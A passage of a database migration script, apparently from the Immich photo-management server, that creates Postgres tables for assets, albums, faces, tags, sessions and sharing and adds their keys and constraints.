await sql`CREATE TABLE "assets" ("id" uuid NOT NULL DEFAULT uuid_generate_v4(), "deviceAssetId" character varying NOT NULL, "ownerId" uuid NOT NULL, "deviceId" character varying NOT NULL, "type" character varying NOT NULL, "originalPath" character varying NOT NULL, "fileCreatedAt" timestamp with time zone NOT NULL, "fileModifiedAt" timestamp with time zone NOT NULL, "isFavorite" boolean NOT NULL DEFAULT false, "duration" character varying, "encodedVideoPath" character varying DEFAULT '', "checksum" bytea NOT NULL, "isVisible" boolean NOT NULL DEFAULT true, "livePhotoVideoId" uuid, "updatedAt" timestamp with time zone NOT NULL DEFAULT now(), "createdAt" timestamp with time zone NOT NULL DEFAULT now(), "isArchived" boolean NOT NULL DEFAULT false, "originalFileName" character varying NOT NULL, "sidecarPath" character varying, "thumbhash" bytea, "isOffline" boolean NOT NULL DEFAULT false, "libraryId" uuid, "isExternal" boolean NOT NULL DEFAULT false, "deletedAt" timestamp with time zone, "localDateTime" timestamp with time zone NOT NULL, "stackId" uuid, "duplicateId" uuid, "status" assets_status_enum NOT NULL DEFAULT 'active', "updateId" uuid NOT NULL DEFAULT immich_uuid_v7());`.execute(db);
|
||||||
|
await sql`CREATE TABLE "albums" ("id" uuid NOT NULL DEFAULT uuid_generate_v4(), "ownerId" uuid NOT NULL, "albumName" character varying NOT NULL DEFAULT 'Untitled Album', "createdAt" timestamp with time zone NOT NULL DEFAULT now(), "albumThumbnailAssetId" uuid, "updatedAt" timestamp with time zone NOT NULL DEFAULT now(), "description" text NOT NULL DEFAULT '', "deletedAt" timestamp with time zone, "isActivityEnabled" boolean NOT NULL DEFAULT true, "order" character varying NOT NULL DEFAULT 'desc', "updateId" uuid NOT NULL DEFAULT immich_uuid_v7());`.execute(db);
|
||||||
|
await sql`COMMENT ON COLUMN "albums"."albumThumbnailAssetId" IS 'Asset ID to be used as thumbnail';`.execute(db);
|
||||||
|
await sql`CREATE TABLE "activity" ("id" uuid NOT NULL DEFAULT uuid_generate_v4(), "createdAt" timestamp with time zone NOT NULL DEFAULT now(), "updatedAt" timestamp with time zone NOT NULL DEFAULT now(), "albumId" uuid NOT NULL, "userId" uuid NOT NULL, "assetId" uuid, "comment" text, "isLiked" boolean NOT NULL DEFAULT false, "updateId" uuid NOT NULL DEFAULT immich_uuid_v7());`.execute(db);
|
||||||
|
await sql`CREATE TABLE "albums_assets_assets" ("albumsId" uuid NOT NULL, "assetsId" uuid NOT NULL, "createdAt" timestamp with time zone NOT NULL DEFAULT now());`.execute(db);
|
||||||
|
await sql`CREATE TABLE "albums_shared_users_users" ("albumsId" uuid NOT NULL, "usersId" uuid NOT NULL, "role" character varying NOT NULL DEFAULT 'editor');`.execute(db);
|
||||||
|
await sql`CREATE TABLE "api_keys" ("name" character varying NOT NULL, "key" character varying NOT NULL, "userId" uuid NOT NULL, "createdAt" timestamp with time zone NOT NULL DEFAULT now(), "updatedAt" timestamp with time zone NOT NULL DEFAULT now(), "id" uuid NOT NULL DEFAULT uuid_generate_v4(), "permissions" character varying[] NOT NULL, "updateId" uuid NOT NULL DEFAULT immich_uuid_v7());`.execute(db);
|
||||||
|
await sql`CREATE TABLE "assets_audit" ("id" uuid NOT NULL DEFAULT immich_uuid_v7(), "assetId" uuid NOT NULL, "ownerId" uuid NOT NULL, "deletedAt" timestamp with time zone NOT NULL DEFAULT clock_timestamp());`.execute(db);
|
||||||
|
await sql`CREATE TABLE "person" ("id" uuid NOT NULL DEFAULT uuid_generate_v4(), "createdAt" timestamp with time zone NOT NULL DEFAULT now(), "updatedAt" timestamp with time zone NOT NULL DEFAULT now(), "ownerId" uuid NOT NULL, "name" character varying NOT NULL DEFAULT '', "thumbnailPath" character varying NOT NULL DEFAULT '', "isHidden" boolean NOT NULL DEFAULT false, "birthDate" date, "faceAssetId" uuid, "isFavorite" boolean NOT NULL DEFAULT false, "color" character varying, "updateId" uuid NOT NULL DEFAULT immich_uuid_v7());`.execute(db);
|
||||||
|
await sql`CREATE TABLE "asset_faces" ("assetId" uuid NOT NULL, "personId" uuid, "imageWidth" integer NOT NULL DEFAULT 0, "imageHeight" integer NOT NULL DEFAULT 0, "boundingBoxX1" integer NOT NULL DEFAULT 0, "boundingBoxY1" integer NOT NULL DEFAULT 0, "boundingBoxX2" integer NOT NULL DEFAULT 0, "boundingBoxY2" integer NOT NULL DEFAULT 0, "id" uuid NOT NULL DEFAULT uuid_generate_v4(), "sourceType" sourcetype NOT NULL DEFAULT 'machine-learning', "deletedAt" timestamp with time zone);`.execute(db);
|
||||||
|
await sql`CREATE TABLE "asset_files" ("id" uuid NOT NULL DEFAULT uuid_generate_v4(), "assetId" uuid NOT NULL, "createdAt" timestamp with time zone NOT NULL DEFAULT now(), "updatedAt" timestamp with time zone NOT NULL DEFAULT now(), "type" character varying NOT NULL, "path" character varying NOT NULL, "updateId" uuid NOT NULL DEFAULT immich_uuid_v7());`.execute(db);
|
||||||
|
await sql`CREATE TABLE "asset_job_status" ("assetId" uuid NOT NULL, "facesRecognizedAt" timestamp with time zone, "metadataExtractedAt" timestamp with time zone, "duplicatesDetectedAt" timestamp with time zone, "previewAt" timestamp with time zone, "thumbnailAt" timestamp with time zone);`.execute(db);
|
||||||
|
await sql`CREATE TABLE "audit" ("id" serial NOT NULL, "entityType" character varying NOT NULL, "entityId" uuid NOT NULL, "action" character varying NOT NULL, "ownerId" uuid NOT NULL, "createdAt" timestamp with time zone NOT NULL DEFAULT now());`.execute(db);
|
||||||
|
await sql`CREATE TABLE "exif" ("assetId" uuid NOT NULL, "make" character varying, "model" character varying, "exifImageWidth" integer, "exifImageHeight" integer, "fileSizeInByte" bigint, "orientation" character varying, "dateTimeOriginal" timestamp with time zone, "modifyDate" timestamp with time zone, "lensModel" character varying, "fNumber" double precision, "focalLength" double precision, "iso" integer, "latitude" double precision, "longitude" double precision, "city" character varying, "state" character varying, "country" character varying, "description" text NOT NULL DEFAULT '', "fps" double precision, "exposureTime" character varying, "livePhotoCID" character varying, "timeZone" character varying, "projectionType" character varying, "profileDescription" character varying, "colorspace" character varying, "bitsPerSample" integer, "autoStackId" character varying, "rating" integer, "updatedAt" timestamp with time zone NOT NULL DEFAULT clock_timestamp(), "updateId" uuid NOT NULL DEFAULT immich_uuid_v7());`.execute(db);
|
||||||
|
await sql`CREATE TABLE "face_search" ("faceId" uuid NOT NULL, "embedding" vector(512) NOT NULL);`.execute(db);
|
||||||
|
await sql`CREATE TABLE "geodata_places" ("id" integer NOT NULL, "name" character varying(200) NOT NULL, "longitude" double precision NOT NULL, "latitude" double precision NOT NULL, "countryCode" character(2) NOT NULL, "admin1Code" character varying(20), "admin2Code" character varying(80), "modificationDate" date NOT NULL, "admin1Name" character varying, "admin2Name" character varying, "alternateNames" character varying);`.execute(db);
|
||||||
|
await sql`CREATE TABLE "memories" ("id" uuid NOT NULL DEFAULT uuid_generate_v4(), "createdAt" timestamp with time zone NOT NULL DEFAULT now(), "updatedAt" timestamp with time zone NOT NULL DEFAULT now(), "deletedAt" timestamp with time zone, "ownerId" uuid NOT NULL, "type" character varying NOT NULL, "data" jsonb NOT NULL, "isSaved" boolean NOT NULL DEFAULT false, "memoryAt" timestamp with time zone NOT NULL, "seenAt" timestamp with time zone, "showAt" timestamp with time zone, "hideAt" timestamp with time zone, "updateId" uuid NOT NULL DEFAULT immich_uuid_v7());`.execute(db);
|
||||||
|
await sql`CREATE TABLE "memories_assets_assets" ("memoriesId" uuid NOT NULL, "assetsId" uuid NOT NULL);`.execute(db);
|
||||||
|
await sql`CREATE TABLE "move_history" ("id" uuid NOT NULL DEFAULT uuid_generate_v4(), "entityId" uuid NOT NULL, "pathType" character varying NOT NULL, "oldPath" character varying NOT NULL, "newPath" character varying NOT NULL);`.execute(db);
|
||||||
|
await sql`CREATE TABLE "naturalearth_countries" ("id" integer NOT NULL GENERATED ALWAYS AS IDENTITY, "admin" character varying(50) NOT NULL, "admin_a3" character varying(3) NOT NULL, "type" character varying(50) NOT NULL, "coordinates" polygon NOT NULL);`.execute(db);
|
||||||
|
await sql`CREATE TABLE "partners_audit" ("id" uuid NOT NULL DEFAULT immich_uuid_v7(), "sharedById" uuid NOT NULL, "sharedWithId" uuid NOT NULL, "deletedAt" timestamp with time zone NOT NULL DEFAULT clock_timestamp());`.execute(db);
|
||||||
|
await sql`CREATE TABLE "partners" ("sharedById" uuid NOT NULL, "sharedWithId" uuid NOT NULL, "createdAt" timestamp with time zone NOT NULL DEFAULT now(), "updatedAt" timestamp with time zone NOT NULL DEFAULT now(), "inTimeline" boolean NOT NULL DEFAULT false, "updateId" uuid NOT NULL DEFAULT immich_uuid_v7());`.execute(db);
|
||||||
|
await sql`CREATE TABLE "sessions" ("id" uuid NOT NULL DEFAULT uuid_generate_v4(), "token" character varying NOT NULL, "createdAt" timestamp with time zone NOT NULL DEFAULT now(), "updatedAt" timestamp with time zone NOT NULL DEFAULT now(), "userId" uuid NOT NULL, "deviceType" character varying NOT NULL DEFAULT '', "deviceOS" character varying NOT NULL DEFAULT '', "updateId" uuid NOT NULL DEFAULT immich_uuid_v7());`.execute(db);
|
||||||
|
await sql`CREATE TABLE "shared_links" ("id" uuid NOT NULL DEFAULT uuid_generate_v4(), "description" character varying, "userId" uuid NOT NULL, "key" bytea NOT NULL, "type" character varying NOT NULL, "createdAt" timestamp with time zone NOT NULL DEFAULT now(), "expiresAt" timestamp with time zone, "allowUpload" boolean NOT NULL DEFAULT false, "albumId" uuid, "allowDownload" boolean NOT NULL DEFAULT true, "showExif" boolean NOT NULL DEFAULT true, "password" character varying);`.execute(db);
|
||||||
|
await sql`CREATE TABLE "shared_link__asset" ("assetsId" uuid NOT NULL, "sharedLinksId" uuid NOT NULL);`.execute(db);
|
||||||
|
await sql`CREATE TABLE "smart_search" ("assetId" uuid NOT NULL, "embedding" vector(512) NOT NULL);`.execute(db);
|
||||||
|
await sql`ALTER TABLE "smart_search" ALTER COLUMN "embedding" SET STORAGE EXTERNAL;`.execute(db);
|
||||||
|
await sql`CREATE TABLE "session_sync_checkpoints" ("sessionId" uuid NOT NULL, "type" character varying NOT NULL, "createdAt" timestamp with time zone NOT NULL DEFAULT now(), "updatedAt" timestamp with time zone NOT NULL DEFAULT now(), "ack" character varying NOT NULL, "updateId" uuid NOT NULL DEFAULT immich_uuid_v7());`.execute(db);
|
||||||
|
await sql`CREATE TABLE "system_metadata" ("key" character varying NOT NULL, "value" jsonb NOT NULL);`.execute(db);
|
||||||
|
await sql`CREATE TABLE "tags" ("id" uuid NOT NULL DEFAULT uuid_generate_v4(), "userId" uuid NOT NULL, "value" character varying NOT NULL, "createdAt" timestamp with time zone NOT NULL DEFAULT now(), "updatedAt" timestamp with time zone NOT NULL DEFAULT now(), "color" character varying, "parentId" uuid, "updateId" uuid NOT NULL DEFAULT immich_uuid_v7());`.execute(db);
|
||||||
|
await sql`CREATE TABLE "tag_asset" ("assetsId" uuid NOT NULL, "tagsId" uuid NOT NULL);`.execute(db);
|
||||||
|
await sql`CREATE TABLE "tags_closure" ("id_ancestor" uuid NOT NULL, "id_descendant" uuid NOT NULL);`.execute(db);
|
||||||
|
await sql`CREATE TABLE "users_audit" ("userId" uuid NOT NULL, "deletedAt" timestamp with time zone NOT NULL DEFAULT clock_timestamp(), "id" uuid NOT NULL DEFAULT immich_uuid_v7());`.execute(db);
|
||||||
|
await sql`CREATE TABLE "user_metadata" ("userId" uuid NOT NULL, "key" character varying NOT NULL, "value" jsonb NOT NULL);`.execute(db);
|
||||||
|
await sql`CREATE TABLE "version_history" ("id" uuid NOT NULL DEFAULT uuid_generate_v4(), "createdAt" timestamp with time zone NOT NULL DEFAULT now(), "version" character varying NOT NULL);`.execute(db);
|
||||||
|
await sql`ALTER TABLE "users" ADD CONSTRAINT "PK_a3ffb1c0c8416b9fc6f907b7433" PRIMARY KEY ("id");`.execute(db);
|
||||||
|
await sql`ALTER TABLE "libraries" ADD CONSTRAINT "PK_505fedfcad00a09b3734b4223de" PRIMARY KEY ("id");`.execute(db);
|
||||||
|
await sql`ALTER TABLE "asset_stack" ADD CONSTRAINT "PK_74a27e7fcbd5852463d0af3034b" PRIMARY KEY ("id");`.execute(db);
|
||||||
|
await sql`ALTER TABLE "assets" ADD CONSTRAINT "PK_da96729a8b113377cfb6a62439c" PRIMARY KEY ("id");`.execute(db);
|
||||||
|
await sql`ALTER TABLE "albums" ADD CONSTRAINT "PK_7f71c7b5bc7c87b8f94c9a93a00" PRIMARY KEY ("id");`.execute(db);
|
||||||
|
await sql`ALTER TABLE "activity" ADD CONSTRAINT "PK_24625a1d6b1b089c8ae206fe467" PRIMARY KEY ("id");`.execute(db);
|
||||||
|
await sql`ALTER TABLE "albums_assets_assets" ADD CONSTRAINT "PK_c67bc36fa845fb7b18e0e398180" PRIMARY KEY ("albumsId", "assetsId");`.execute(db);
|
||||||
|
await sql`ALTER TABLE "albums_shared_users_users" ADD CONSTRAINT "PK_7df55657e0b2e8b626330a0ebc8" PRIMARY KEY ("albumsId", "usersId");`.execute(db);
|
||||||
|
await sql`ALTER TABLE "api_keys" ADD CONSTRAINT "PK_5c8a79801b44bd27b79228e1dad" PRIMARY KEY ("id");`.execute(db);
|
||||||
|
await sql`ALTER TABLE "assets_audit" ADD CONSTRAINT "PK_99bd5c015f81a641927a32b4212" PRIMARY KEY ("id");`.execute(db);
|
||||||
|
await sql`ALTER TABLE "person" ADD CONSTRAINT "PK_5fdaf670315c4b7e70cce85daa3" PRIMARY KEY ("id");`.execute(db);
|
||||||
|
await sql`ALTER TABLE "asset_faces" ADD CONSTRAINT "PK_6df76ab2eb6f5b57b7c2f1fc684" PRIMARY KEY ("id");`.execute(db);
|
||||||
|
await sql`ALTER TABLE "asset_files" ADD CONSTRAINT "PK_c41dc3e9ef5e1c57ca5a08a0004" PRIMARY KEY ("id");`.execute(db);
|
||||||
|
await sql`ALTER TABLE "asset_job_status" ADD CONSTRAINT "PK_420bec36fc02813bddf5c8b73d4" PRIMARY KEY ("assetId");`.execute(db);
|
||||||
|
await sql`ALTER TABLE "audit" ADD CONSTRAINT "PK_1d3d120ddaf7bc9b1ed68ed463a" PRIMARY KEY ("id");`.execute(db);
|
||||||
|
await sql`ALTER TABLE "exif" ADD CONSTRAINT "PK_c0117fdbc50b917ef9067740c44" PRIMARY KEY ("assetId");`.execute(db);
|
||||||
|
await sql`ALTER TABLE "face_search" ADD CONSTRAINT "face_search_pkey" PRIMARY KEY ("faceId");`.execute(db);
|
||||||
|
await sql`ALTER TABLE "geodata_places" ADD CONSTRAINT "PK_c29918988912ef4036f3d7fbff4" PRIMARY KEY ("id");`.execute(db);
|
||||||
|
await sql`ALTER TABLE "memories" ADD CONSTRAINT "PK_aaa0692d9496fe827b0568612f8" PRIMARY KEY ("id");`.execute(db);
|
||||||
|
await sql`ALTER TABLE "memories_assets_assets" ADD CONSTRAINT "PK_fcaf7112a013d1703c011c6793d" PRIMARY KEY ("memoriesId", "assetsId");`.execute(db);
|
||||||
|
await sql`ALTER TABLE "move_history" ADD CONSTRAINT "PK_af608f132233acf123f2949678d" PRIMARY KEY ("id");`.execute(db);
|
||||||
|
await sql`ALTER TABLE "naturalearth_countries" ADD CONSTRAINT "PK_21a6d86d1ab5d841648212e5353" PRIMARY KEY ("id");`.execute(db);
|
||||||
|
await sql`ALTER TABLE "partners_audit" ADD CONSTRAINT "PK_952b50217ff78198a7e380f0359" PRIMARY KEY ("id");`.execute(db);
|
||||||
|
await sql`ALTER TABLE "partners" ADD CONSTRAINT "PK_f1cc8f73d16b367f426261a8736" PRIMARY KEY ("sharedById", "sharedWithId");`.execute(db);
|
||||||
|
await sql`ALTER TABLE "sessions" ADD CONSTRAINT "PK_48cb6b5c20faa63157b3c1baf7f" PRIMARY KEY ("id");`.execute(db);
|
||||||
|
await sql`ALTER TABLE "shared_links" ADD CONSTRAINT "PK_642e2b0f619e4876e5f90a43465" PRIMARY KEY ("id");`.execute(db);
|
||||||
|
await sql`ALTER TABLE "shared_link__asset" ADD CONSTRAINT "PK_9b4f3687f9b31d1e311336b05e3" PRIMARY KEY ("assetsId", "sharedLinksId");`.execute(db);
|
||||||
|
await sql`ALTER TABLE "smart_search" ADD CONSTRAINT "smart_search_pkey" PRIMARY KEY ("assetId");`.execute(db);
|
||||||
|
await sql`ALTER TABLE "session_sync_checkpoints" ADD CONSTRAINT "PK_b846ab547a702863ef7cd9412fb" PRIMARY KEY ("sessionId", "type");`.execute(db);
|
||||||
|
await sql`ALTER TABLE "system_metadata" ADD CONSTRAINT "PK_fa94f6857470fb5b81ec6084465" PRIMARY KEY ("key");`.execute(db);
|
||||||
|
await sql`ALTER TABLE "tags" ADD CONSTRAINT "PK_e7dc17249a1148a1970748eda99" PRIMARY KEY ("id");`.execute(db);
|
||||||
|
await sql`ALTER TABLE "tag_asset" ADD CONSTRAINT "PK_ef5346fe522b5fb3bc96454747e" PRIMARY KEY ("assetsId", "tagsId");`.execute(db);
|
||||||
|
await sql`ALTER TABLE "tags_closure" ADD CONSTRAINT "PK_eab38eb12a3ec6df8376c95477c" PRIMARY KEY ("id_ancestor", "id_descendant");`.execute(db);
|
||||||
|
await sql`ALTER TABLE "users_audit" ADD CONSTRAINT "PK_e9b2bdfd90e7eb5961091175180" PRIMARY KEY ("id");`.execute(db);
|
||||||
|
await sql`ALTER TABLE "user_metadata" ADD CONSTRAINT "PK_5931462150b3438cbc83277fe5a" PRIMARY KEY ("userId", "key");`.execute(db);
|
||||||
|
await sql`ALTER TABLE "version_history" ADD CONSTRAINT "PK_5db259cbb09ce82c0d13cfd1b23" PRIMARY KEY ("id");`.execute(db);
|
||||||
|
await sql`ALTER TABLE "libraries" ADD CONSTRAINT "FK_0f6fc2fb195f24d19b0fb0d57c1" FOREIGN KEY ("ownerId") REFERENCES "users" ("id") ON UPDATE CASCADE ON DELETE CASCADE;`.execute(db);
|
||||||
|
await sql`ALTER TABLE "asset_stack" ADD CONSTRAINT "FK_91704e101438fd0653f582426dc" FOREIGN KEY ("primaryAssetId") REFERENCES "assets" ("id") ON UPDATE NO ACTION ON DELETE NO ACTION;`.execute(db);
|
||||||
|
await sql`ALTER TABLE "asset_stack" ADD CONSTRAINT "FK_c05079e542fd74de3b5ecb5c1c8" FOREIGN KEY ("ownerId") REFERENCES "users" ("id") ON UPDATE CASCADE ON DELETE CASCADE;`.execute(db);
|
||||||
|
await sql`ALTER TABLE "assets" ADD CONSTRAINT "FK_2c5ac0d6fb58b238fd2068de67d" FOREIGN KEY ("ownerId") REFERENCES "users" ("id") ON UPDATE CASCADE ON DELETE CASCADE;`.execute(db);
|
||||||
|
await sql`ALTER TABLE "assets" ADD CONSTRAINT "FK_16294b83fa8c0149719a1f631ef" FOREIGN KEY ("livePhotoVideoId") REFERENCES "assets" ("id") ON UPDATE CASCADE ON DELETE SET NULL;`.execute(db);
|
||||||
|
await sql`ALTER TABLE "assets" ADD CONSTRAINT "FK_9977c3c1de01c3d848039a6b90c" FOREIGN KEY ("libraryId") REFERENCES "libraries" ("id") ON UPDATE CASCADE ON DELETE CASCADE;`.execute(db);
|
||||||
|
await sql`ALTER TABLE "assets" ADD CONSTRAINT "FK_f15d48fa3ea5e4bda05ca8ab207" FOREIGN KEY ("stackId") REFERENCES "asset_stack" ("id") ON UPDATE CASCADE ON DELETE SET NULL;`.execute(db);
|
||||||
|
await sql`ALTER TABLE "albums" ADD CONSTRAINT "FK_b22c53f35ef20c28c21637c85f4" FOREIGN KEY ("ownerId") REFERENCES "users" ("id") ON UPDATE CASCADE ON DELETE CASCADE;`.execute(db);
|
||||||
|
await sql`ALTER TABLE "albums" ADD CONSTRAINT "FK_05895aa505a670300d4816debce" FOREIGN KEY ("albumThumbnailAssetId") REFERENCES "assets" ("id") ON UPDATE CASCADE ON DELETE SET NULL;`.execute(db);
|
||||||
|
await sql`ALTER TABLE "activity" ADD CONSTRAINT "FK_1af8519996fbfb3684b58df280b" FOREIGN KEY ("albumId") REFERENCES "albums" ("id") ON UPDATE CASCADE ON DELETE CASCADE;`.execute(db);
|
||||||
|
await sql`ALTER TABLE "activity" ADD CONSTRAINT "FK_3571467bcbe021f66e2bdce96ea" FOREIGN KEY ("userId") REFERENCES "users" ("id") ON UPDATE CASCADE ON DELETE CASCADE;`.execute(db);
|
||||||
|
await sql`ALTER TABLE "activity" ADD CONSTRAINT "FK_8091ea76b12338cb4428d33d782" FOREIGN KEY ("assetId") REFERENCES "assets" ("id") ON UPDATE CASCADE ON DELETE CASCADE;`.execute(db);
|
||||||
|
await sql`ALTER TABLE "albums_assets_assets" ADD CONSTRAINT "FK_e590fa396c6898fcd4a50e40927" FOREIGN KEY ("albumsId") REFERENCES "albums" ("id") ON UPDATE CASCADE ON DELETE CASCADE;`.execute(db);
|
||||||
|
await sql`ALTER TABLE "albums_assets_assets" ADD CONSTRAINT "FK_4bd1303d199f4e72ccdf998c621" FOREIGN KEY ("assetsId") REFERENCES "assets" ("id") ON UPDATE CASCADE ON DELETE CASCADE;`.execute(db);
|
||||||
|
await sql`ALTER TABLE "albums_shared_users_users" ADD CONSTRAINT "FK_427c350ad49bd3935a50baab737" FOREIGN KEY ("albumsId") REFERENCES "albums" ("id") ON UPDATE CASCADE ON DELETE CASCADE;`.execute(db);
|
||||||
|
await sql`ALTER TABLE "albums_shared_users_users" ADD CONSTRAINT "FK_f48513bf9bccefd6ff3ad30bd06" FOREIGN KEY ("usersId") REFERENCES "users" ("id") ON UPDATE CASCADE ON DELETE CASCADE;`.execute(db);
|
||||||
|
await sql`ALTER TABLE "api_keys" ADD CONSTRAINT "FK_6c2e267ae764a9413b863a29342" FOREIGN KEY ("userId") REFERENCES "users" ("id") ON UPDATE CASCADE ON DELETE CASCADE;`.execute(db);
|
||||||
|
await sql`ALTER TABLE "person" ADD CONSTRAINT "FK_5527cc99f530a547093f9e577b6" FOREIGN KEY ("ownerId") REFERENCES "users" ("id") ON UPDATE CASCADE ON DELETE CASCADE;`.execute(db);
|
||||||
|
await sql`ALTER TABLE "person" ADD CONSTRAINT "FK_2bbabe31656b6778c6b87b61023" FOREIGN KEY ("faceAssetId") REFERENCES "asset_faces" ("id") ON UPDATE NO ACTION ON DELETE SET NULL;`.execute(db);
|
||||||
|
await sql`ALTER TABLE "asset_faces" ADD CONSTRAINT "FK_02a43fd0b3c50fb6d7f0cb7282c" FOREIGN KEY ("assetId") REFERENCES "assets" ("id") ON UPDATE CASCADE ON DELETE CASCADE;`.execute(db);
|
||||||
|
await sql`ALTER TABLE "asset_faces" ADD CONSTRAINT "FK_95ad7106dd7b484275443f580f9" FOREIGN KEY ("personId") REFERENCES "person" ("id") ON UPDATE CASCADE ON DELETE SET NULL;`.execute(db);
|
||||||
|
await sql`ALTER TABLE "asset_files" ADD CONSTRAINT "FK_e3e103a5f1d8bc8402999286040" FOREIGN KEY ("assetId") REFERENCES "assets" ("id") ON UPDATE CASCADE ON DELETE CASCADE;`.execute(db);
|
||||||
|
await sql`ALTER TABLE "asset_job_status" ADD CONSTRAINT "FK_420bec36fc02813bddf5c8b73d4" FOREIGN KEY ("assetId") REFERENCES "assets" ("id") ON UPDATE CASCADE ON DELETE CASCADE;`.execute(db);
|
||||||
|
await sql`ALTER TABLE "exif" ADD CONSTRAINT "FK_c0117fdbc50b917ef9067740c44" FOREIGN KEY ("assetId") REFERENCES "assets" ("id") ON UPDATE NO ACTION ON DELETE CASCADE;`.execute(db);
|
||||||
|
await sql`ALTER TABLE "face_search" ADD CONSTRAINT "face_search_faceId_fkey" FOREIGN KEY ("faceId") REFERENCES "asset_faces" ("id") ON UPDATE NO ACTION ON DELETE CASCADE;`.execute(db);
|
||||||
|
await sql`ALTER TABLE "memories" ADD CONSTRAINT "FK_575842846f0c28fa5da46c99b19" FOREIGN KEY ("ownerId") REFERENCES "users" ("id") ON UPDATE CASCADE ON DELETE CASCADE;`.execute(db);
|
||||||
|
await sql`ALTER TABLE "memories_assets_assets" ADD CONSTRAINT "FK_984e5c9ab1f04d34538cd32334e" FOREIGN KEY ("memoriesId") REFERENCES "memories" ("id") ON UPDATE CASCADE ON DELETE CASCADE;`.execute(db);
|
||||||
|
await sql`ALTER TABLE "memories_assets_assets" ADD CONSTRAINT "FK_6942ecf52d75d4273de19d2c16f" FOREIGN KEY ("assetsId") REFERENCES "assets" ("id") ON UPDATE CASCADE ON DELETE CASCADE;`.execute(db);
|
||||||
|
await sql`ALTER TABLE "partners" ADD CONSTRAINT "FK_7e077a8b70b3530138610ff5e04" FOREIGN KEY ("sharedById") REFERENCES "users" ("id") ON UPDATE NO ACTION ON DELETE CASCADE;`.execute(db);
|
||||||
|
await sql`ALTER TABLE "partners" ADD CONSTRAINT "FK_d7e875c6c60e661723dbf372fd3" FOREIGN KEY ("sharedWithId") REFERENCES "users" ("id") ON UPDATE NO ACTION ON DELETE CASCADE;`.execute(db);
|
||||||
|
await sql`ALTER TABLE "sessions" ADD CONSTRAINT "FK_57de40bc620f456c7311aa3a1e6" FOREIGN KEY ("userId") REFERENCES "users" ("id") ON UPDATE CASCADE ON DELETE CASCADE;`.execute(db);
|
||||||
|
await sql`ALTER TABLE "shared_links" ADD CONSTRAINT "FK_66fe3837414c5a9f1c33ca49340" FOREIGN KEY ("userId") REFERENCES "users" ("id") ON UPDATE CASCADE ON DELETE CASCADE;`.execute(db);
|
||||||
|
await sql`ALTER TABLE "shared_links" ADD CONSTRAINT "FK_0c6ce9058c29f07cdf7014eac66" FOREIGN KEY ("albumId") REFERENCES "albums" ("id") ON UPDATE CASCADE ON DELETE CASCADE;`.execute(db);
|
||||||
|
await sql`ALTER TABLE "shared_link__asset" ADD CONSTRAINT "FK_5b7decce6c8d3db9593d6111a66" FOREIGN KEY ("assetsId") REFERENCES "assets" ("id") ON UPDATE CASCADE ON DELETE CASCADE;`.execute(db);
|
||||||
|
await sql`ALTER TABLE "shared_link__asset" ADD CONSTRAINT "FK_c9fab4aa97ffd1b034f3d6581ab" FOREIGN KEY ("sharedLinksId") REFERENCES "shared_links" ("id") ON UPDATE CASCADE ON DELETE CASCADE;`.execute(db);
|
||||||
|
await sql`ALTER TABLE "smart_search" ADD CONSTRAINT "smart_search_assetId_fkey" FOREIGN KEY ("assetId") REFERENCES "assets" ("id") ON UPDATE NO ACTION ON DELETE CASCADE;`.execute(db);
|
||||||
|
await sql`ALTER TABLE "session_sync_checkpoints" ADD CONSTRAINT "FK_d8ddd9d687816cc490432b3d4bc" FOREIGN KEY ("sessionId") REFERENCES "sessions" ("id") ON UPDATE CASCADE ON DELETE CASCADE;`.execute(db);
|
||||||
|
await sql`ALTER TABLE "tags" ADD CONSTRAINT "FK_92e67dc508c705dd66c94615576" FOREIGN KEY ("userId") REFERENCES "users" ("id") ON UPDATE CASCADE ON DELETE CASCADE;`.execute(db);
|
||||||
|
await sql`ALTER TABLE "tags" ADD CONSTRAINT "FK_9f9590cc11561f1f48ff034ef99" FOREIGN KEY ("parentId") REFERENCES "tags" ("id") ON UPDATE NO ACTION ON DELETE CASCADE;`.execute(db);
|
||||||
|
await sql`ALTER TABLE "tag_asset" ADD CONSTRAINT "FK_f8e8a9e893cb5c54907f1b798e9" FOREIGN KEY ("assetsId") REFERENCES "assets" ("id") ON UPDATE CASCADE ON DELETE CASCADE;`.execute(db);
|
||||||
|
await sql`ALTER TABLE "tag_asset" ADD CONSTRAINT "FK_e99f31ea4cdf3a2c35c7287eb42" FOREIGN KEY ("tagsId") REFERENCES "tags" ("id") ON UPDATE CASCADE ON DELETE CASCADE;`.execute(db);
|
||||||
|
await sql`ALTER TABLE "tags_closure" ADD CONSTRAINT "FK_15fbcbc67663c6bfc07b354c22c" FOREIGN KEY ("id_ancestor") REFERENCES "tags" ("id") ON UPDATE NO ACTION ON DELETE CASCADE;`.execute(db);
|
||||||
|
await sql`ALTER TABLE "tags_closure" ADD CONSTRAINT "FK_b1a2a7ed45c29179b5ad51548a1" FOREIGN KEY ("id_descendant") REFERENCES "tags" ("id") ON UPDATE NO ACTION ON DELETE CASCADE;`.execute(db);
|
||||||
|
await sql`ALTER TABLE "user_metadata" ADD CONSTRAINT "FK_6afb43681a21cf7815932bc38ac" FOREIGN KEY ("userId") REFERENCES "users" ("id") ON UPDATE CASCADE ON DELETE CASCADE;`.execute(db);
|
||||||
|
await sql`ALTER TABLE "users" ADD CONSTRAINT "UQ_97672ac88f789774dd47f7c8be3" UNIQUE ("email");`.execute(db);
|
||||||
|
await sql`ALTER TABLE "users" ADD CONSTRAINT "UQ_b309cf34fa58137c416b32cea3a" UNIQUE ("storageLabel");`.execute(db);
|
||||||
|
await sql`ALTER TABLE "asset_stack" ADD CONSTRAINT "REL_91704e101438fd0653f582426d" UNIQUE ("primaryAssetId");`.execute(db);
|
||||||
|
await sql`ALTER TABLE "asset_files" ADD CONSTRAINT "UQ_assetId_type" UNIQUE ("assetId", "type");`.execute(db);
|
||||||
|
await sql`ALTER TABLE "move_history" ADD CONSTRAINT "UQ_newPath" UNIQUE ("newPath");`.execute(db);
|
||||||
|
await sql`ALTER TABLE "move_history" ADD CONSTRAINT "UQ_entityId_pathType" UNIQUE ("entityId", "pathType");`.execute(db);
|
||||||
|
await sql`ALTER TABLE "shared_links" ADD CONSTRAINT "UQ_sharedlink_key" UNIQUE ("key");`.execute(db);
|
||||||
|
await sql`ALTER TABLE "tags" ADD CONSTRAINT "UQ_79d6f16e52bb2c7130375246793" UNIQUE ("userId", "value");`.execute(db);
|
||||||
|
await sql`ALTER TABLE "activity" ADD CONSTRAINT "CHK_2ab1e70f113f450eb40c1e3ec8" CHECK (("comment" IS NULL AND "isLiked" = true) OR ("comment" IS NOT NULL AND "isLiked" = false));`.execute(db);
|
||||||
|
